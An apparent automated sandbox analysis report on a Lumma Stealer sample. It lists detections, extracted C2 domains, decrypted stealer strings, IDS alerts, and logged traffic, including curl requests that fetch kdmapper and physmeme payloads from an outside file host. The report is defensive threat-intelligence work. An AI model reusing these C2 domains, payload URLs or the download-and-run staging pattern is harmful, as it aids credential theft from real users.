                                Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                Source: C:\Edge\L6lFlVnd0szYUYb26bZc.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                Source: C:\Users\user\Desktop\ASIzYbXK.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                Source: C:\Edge\msedge.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                Source: C:\Users\user\Desktop\KAbPIEds.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                Source: C:\Users\user\AppData\Local\Temp\W7vO5ocqvr.batAvira: detection malicious, Label: BAT/Delbat.C
                                Source: C:\Users\user\Desktop\dZblWXPP.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                Source: C:\Users\user\Desktop\HiOQLkRz.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                Source: C:\Users\user\AppData\Local\Temp\Cb8ciTnPhW.batAvira: detection malicious, Label: BAT/Delbat.C
                                Source: C:\Users\user\Desktop\TqIVmuJi.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                Source: C:\Users\user\AppData\Local\Temp\NnkzcdwAFb.batAvira: detection malicious, Label: BAT/Delbat.C
                                Source: C:\Users\user\Desktop\XkTUfoHN.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                Source: 12.2.RegAsm.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["tearrybyiwo.shop", "fossillargeiw.shop", "surveriysiop.shop", "captainynfanw.shop", "tiddymarktwo.shop", "strappystyio.shop", "appleboltelwk.shop", "coursedonnyre.shop", "tendencerangej.shop"], "Build id": "1AsNN2--5899070203"}
                                Source: C:\Edge\msedge.exeReversingLabs: Detection: 73%
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeReversingLabs: Detection: 73%
                                Source: C:\Users\user\Desktop\BegQTYoT.logReversingLabs: Detection: 25%
                                Source: C:\Users\user\Desktop\KAbPIEds.logReversingLabs: Detection: 70%
                                Source: C:\Users\user\Desktop\OPvxZeSl.logReversingLabs: Detection: 29%
                                Source: C:\Users\user\Desktop\XkTUfoHN.logReversingLabs: Detection: 70%
                                Source: C:\Users\user\Desktop\dZblWXPP.logReversingLabs: Detection: 70%
                                Source: C:\Users\user\Desktop\sozKoiId.logReversingLabs: Detection: 25%
                                Source: C:\Users\user\Desktop\uNKjQhPt.logReversingLabs: Detection: 29%
                                Source: C:\Users\user\Desktop\vpYzbqhQ.logReversingLabs: Detection: 25%
                                Source: C:\Users\user\Desktop\xSuJhsEU.logReversingLabs: Detection: 29%
                                Source: C:\Windows\Speech\kdmapper.exeReversingLabs: Detection: 68%
                                Source: C:\Windows\Speech\physmeme.exeReversingLabs: Detection: 60%
                                Source: gh3zRWl4or.exeReversingLabs: Detection: 55%
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeJoe Sandbox ML: detected
                                Source: C:\Edge\msedge.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\fnSuHmrC.logJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\aowVPJEW.logJoe Sandbox ML: detected
                                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\ZcXEVMnO.logJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\BegQTYoT.logJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\KAbPIEds.logJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\dZblWXPP.logJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\XkTUfoHN.logJoe Sandbox ML: detected
                                Source: 12.2.RegAsm.exe.400000.0.raw.unpackString decryptor: strappystyio.shop
                                Source: 12.2.RegAsm.exe.400000.0.raw.unpackString decryptor: coursedonnyre.shop
                                Source: 12.2.RegAsm.exe.400000.0.raw.unpackString decryptor: fossillargeiw.shop
                                Source: 12.2.RegAsm.exe.400000.0.raw.unpackString decryptor: tendencerangej.shop
                                Source: 12.2.RegAsm.exe.400000.0.raw.unpackString decryptor: appleboltelwk.shop
                                Source: 12.2.RegAsm.exe.400000.0.raw.unpackString decryptor: tearrybyiwo.shop
                                Source: 12.2.RegAsm.exe.400000.0.raw.unpackString decryptor: captainynfanw.shop
                                Source: 12.2.RegAsm.exe.400000.0.raw.unpackString decryptor: surveriysiop.shop
                                Source: 12.2.RegAsm.exe.400000.0.raw.unpackString decryptor: tiddymarktwo.shop
                                Source: 12.2.RegAsm.exe.400000.0.raw.unpackString decryptor: lid=%s&j=%s&ver=4.0
                                Source: 12.2.RegAsm.exe.400000.0.raw.unpackString decryptor: TeslaBrowser/5.5
                                Source: 12.2.RegAsm.exe.400000.0.raw.unpackString decryptor: - Screen Resoluton:
                                Source: 12.2.RegAsm.exe.400000.0.raw.unpackString decryptor: - Physical Installed Memory:
                                Source: 12.2.RegAsm.exe.400000.0.raw.unpackString decryptor: Workgroup: -
                                Source: 12.2.RegAsm.exe.400000.0.raw.unpackString decryptor: 1AsNN2--5899070203
                                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49701 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49704 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:65264 version: TLS 1.2
                                Source: gh3zRWl4or.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kdmapper.exe, 00000006.00000003.1361668958.0000000005244000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 00000006.00000003.1359428900.0000000006A09000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmp, kdmapper.exe, 00000006.00000000.1351838623.0000000000653000.00000002.00000001.01000000.00000006.sdmp
                                Source: Binary string: ;C:\Users\user\AppData\Local\Temp\aj4rgj30\aj4rgj30.pdb source: msedge.exe, 00000010.00000002.1577856617.0000000003522000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: System.Windows.Forms.pdb source: LBUPSPkYsNXrxZEtdVzCng.exe, 00000025.00000002.2229912737.000000001AE15000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: msedge.exe, 00000036.00000002.1978196231.00000000010C0000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\Administrator\Desktop\Ghosty\build\usermode\usermode.pdb source: gh3zRWl4or.exe
                                Source: Binary string: em.pdb source: msedge.exe, 00000036.00000002.2118185806.000000001B611000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\Administrator\Desktop\Ghosty\build\usermode\usermode.pdb66 source: gh3zRWl4or.exe
                                Source: Binary string: m.pdb source: msedge.exe, 00000036.00000002.2118185806.000000001B580000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: c:\rje\tg\k5ye\obj\Release\Fcs.pdb source: curl.exe, 00000008.00000003.1365070939.000001D6FD270000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000008.00000003.1364865814.000001D6FD2CD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000008.00000003.1364609974.000001D6FD2CD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000008.00000003.1364788311.000001D6FD2CD000.00000004.00000020.00020000.00000000.sdmp, physmeme.exe.8.dr
                                Source: Binary string: stem.pdbpdbtem.pdb source: LBUPSPkYsNXrxZEtdVzCng.exe, 00000025.00000002.2229912737.000000001AE15000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: 5ye\obj\Release\Fcs.pdb source: curl.exe, 00000008.00000003.1364788311.000001D6FD2B4000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: System.pdb source: msedge.exe, 00000036.00000002.1978196231.00000000010C0000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ;C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.pdb source: msedge.exe, 00000010.00000002.1577856617.0000000003522000.00000004.00000800.00020000.00000000.sdmp

                                Spreading

                                barindex
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF67418DADC GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,0_2_00007FF67418DADC
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_0062A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,6_2_0062A69B
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_0063C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,6_2_0063C220
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_0064B348 FindFirstFileExA,6_2_0064B348
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior

                                Software Vulnerabilities

                                barindex
                                Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [ecx+eax]12_2_0040F7B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]12_2_0041407F
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+28h]12_2_0041407F
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+28h]12_2_00414031
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [edi+eax]12_2_0042D150
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx12_2_0043F150
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, eax12_2_00407170
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]12_2_00441100
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h12_2_0044A1E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h12_2_0041F193
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [esi], ax12_2_0041F193
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h12_2_00416361
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax12_2_00416361
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h12_2_0044A360
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]12_2_0042D3CC
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]12_2_004473FA
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-34h]12_2_00424390
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]12_2_004283A5
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]12_2_004303B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]12_2_0043F479
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]12_2_0042F40F
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]12_2_00443420
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah12_2_0044A4D0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, ebp12_2_0040A4E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, ebp12_2_0040A4E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-18h]12_2_0042B490
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]12_2_0044A5E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]12_2_00412653
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-54h]12_2_004206E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh12_2_00443870
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]12_2_0043F8C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h12_2_0043F8C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]12_2_0043A880
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]12_2_0044A8B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]12_2_004468B9
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]12_2_00412653
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h12_2_00426910
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh12_2_004449F0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]12_2_0041399C
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, ecx12_2_0041399C
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]12_2_004499B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebp, word ptr [edi]12_2_0043EA30
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h12_2_00415ADF
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h12_2_0041DAA0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push ebx12_2_0041DAA0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]12_2_0040DAB0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx12_2_00426B80
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh12_2_0042BC50
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh12_2_0042BC50
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx12_2_00449C10
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]12_2_00413CC6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]12_2_00412653
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [edi+eax]12_2_0042CCDD
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [edi+eax]12_2_0042CCF5
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]12_2_00428C90
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]12_2_00404CB0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]12_2_0042ED6D
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]12_2_0042ED6D
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]12_2_00405D10
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]12_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al12_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al12_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+00000744h]12_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al12_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al12_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al12_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, 0000000Bh12_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al12_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]12_2_00447E30
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh12_2_00447E30
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h12_2_00415EF6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax12_2_00415EF6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esp], 00000000h12_2_0041AF50
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]12_2_00410F0F
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, dword ptr [ebp-3Ch]12_2_0042DFD6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh12_2_00443FA0

                                Networking

                                barindex
                                Source: Network trafficSuricata IDS: 2056172 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tiddymarktwo .shop) : 192.168.2.7:49437 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056056 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tearrybyiwo .shop) : 192.168.2.7:61249 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056054 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (surveriysiop .shop) : 192.168.2.7:59776 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056040 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (captainynfanw .shop) : 192.168.2.7:52053 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056036 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appleboltelwk .shop) : 192.168.2.7:63135 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056046 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fossillargeiw .shop) : 192.168.2.7:60439 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056058 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tendencerangej .shop) : 192.168.2.7:59487 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056052 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strappystyio .shop) : 192.168.2.7:50957 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056042 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (coursedonnyre .shop) : 192.168.2.7:58230 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056172 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tiddymarktwo .shop) : 192.168.2.7:65263 -> 1.1.1.1:53
                                Source: Malware configuration extractorURLs: tearrybyiwo.shop
                                Source: Malware configuration extractorURLs: fossillargeiw.shop
                                Source: Malware configuration extractorURLs: surveriysiop.shop
                                Source: Malware configuration extractorURLs: captainynfanw.shop
                                Source: Malware configuration extractorURLs: tiddymarktwo.shop
                                Source: Malware configuration extractorURLs: strappystyio.shop
                                Source: Malware configuration extractorURLs: appleboltelwk.shop
                                Source: Malware configuration extractorURLs: coursedonnyre.shop
                                Source: Malware configuration extractorURLs: tendencerangej.shop
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                                Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
                                Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
                                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global trafficHTTP traffic detected: GET /ZmE_ziOgiFXI9Y48/kdmapper.bin HTTP/1.1Host: file.gardenUser-Agent: curl/7.83.1Accept: */*
                                Source: global trafficHTTP traffic detected: GET /ZmE_ziOgiFXI9Y48/physmeme.bin HTTP/1.1Host: file.gardenUser-Agent: curl/7.83.1Accept: */*
                                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                                Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                                Source: global trafficDNS traffic detected: DNS query: file.garden
                                Source: global trafficDNS traffic detected: DNS query: tiddymarktwo.shop
                                Source: global trafficDNS traffic detected: DNS query: surveriysiop.shop
                                Source: global trafficDNS traffic detected: DNS query: captainynfanw.shop
                                Source: global trafficDNS traffic detected: DNS query: tearrybyiwo.shop
                                Source: global trafficDNS traffic detected: DNS query: appleboltelwk.shop
                                Source: global trafficDNS traffic detected: DNS query: tendencerangej.shop
                                Source: global trafficDNS traffic detected: DNS query: fossillargeiw.shop
                                Source: global trafficDNS traffic detected: DNS query: coursedonnyre.shop
                                Source: global trafficDNS traffic detected: DNS query: strappystyio.shop
